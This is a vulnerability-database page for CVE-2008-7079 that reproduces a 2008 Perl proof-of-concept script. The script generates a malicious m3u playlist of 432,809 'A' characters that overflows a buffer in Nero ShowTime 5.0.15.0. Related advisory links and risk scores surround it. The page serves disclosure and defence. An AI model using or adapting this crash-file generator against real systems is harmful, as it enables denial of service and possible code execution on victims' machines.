Lucene search
K

Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC

🗓️ 24 Nov 2008 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 115 Views

Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC, Vulnerability allows remote code executio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-7079
24 Nov 200800:00
circl
CVE
CVE-2008-7079
25 Aug 200910:00
cve
Cvelist
CVE-2008-7079
25 Aug 200910:00
cvelist
EUVD
EUVD-2008-7038
7 Oct 202500:30
euvd
NVD
CVE-2008-7079
25 Aug 200910:30
nvd
OpenVAS
Nero ShowTime 'm3u' File Remote Buffer Overflow Vulnerability
10 Dec 200800:00
openvas
OpenVAS
Nero ShowTime 'm3u' File Remote Buffer Overflow Vulnerability
10 Dec 200800:00
openvas
Prion
Buffer overflow
25 Aug 200910:30
prion
<html><body><p>#!/usr/bin/perl -w
#
# Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
#
# Summary: Nero ShowTime provides you with a high-performance software DVD player
# that takes you to a new dimension in DVD's. Its cinema-like sound and excellent image
# quality for all digital pictures make an adventure of every film! What is more, Nero ShowTime
# supports all DVD-Video formats and can play them from a disc and from the hard drive.
#
# Product web page: http://www.nero.com
#
# Description: Nero ShowTime is prone to a buffer-overflow vulnerability because it fails
# to perform adequate boundary checks on user-supplied input. Successfully exploiting
# these issues may allow remote attackers to execute arbitrary code in the context of the
# application. Failed exploit attempts will cause denial-of-service conditions. Nero ShowTime
# 5.0.15.0 is vulnerable, prior versions may also be affected.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [ t00t ] gmail [ d0t ] com
#
# 24.11.2008
#

$filename = "Jackie_Chan.m3u";

$mana = "A" x 432809;

print "\n\n[*] Creating evul playlist: $filename ...\r\n";
sleep(3);

open(m3u, "&gt;./$filename") || die "\n\aCannot open $filename: $!";

print m3u "$mana";

close (m3u);

print "\n[*] Playlist file successfully created!\r\n";</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2008 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 29.3
EPSS0.26051
115